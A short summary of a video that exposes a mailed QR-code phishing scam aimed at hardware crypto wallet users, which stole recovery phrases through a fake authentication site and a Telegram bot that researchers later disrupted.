Cryptocurrency Phishing Scam Targets Treasure and Ledger Users via Physical Mail

🎬 The video exposes a cryptocurrency phishing scam targeting users of Treasure and Ledger via physical mail, where attackers sent letters urging recipients to scan a QR code for an "authentication check" by February 15th. The QR code directed victims to a fake website (Treasure.authentication-check.io) that prompted them to enter their wallet recovery phrase, which would grant attackers full access to drain funds. The scam leveraged urgency and fake legitimacy, including a forged signature from Ledger’s CEO, though the website was already taken down by the time of analysis. Researchers discovered the phishing site exfiltrated stolen recovery phrases directly to a Telegram bot API, exposing the bot token and chat metadata, including a username ("Flexi6T") linked to the campaign. A separate breach forum post from January 5th advertised a database of 100,000+ Ledger customers, including physical addresses, suggesting how attackers obtained targets for the mail campaign. The video highlights how the Telegram bot’s admin privileges allowed researchers to disrupt the operation by revoking access, though the campaign’s scale and victim count remained unclear. Additional scams used similar subdomain spoofing tactics (e.g., Ledger.[malicious-domain]) to mimic legitimate services.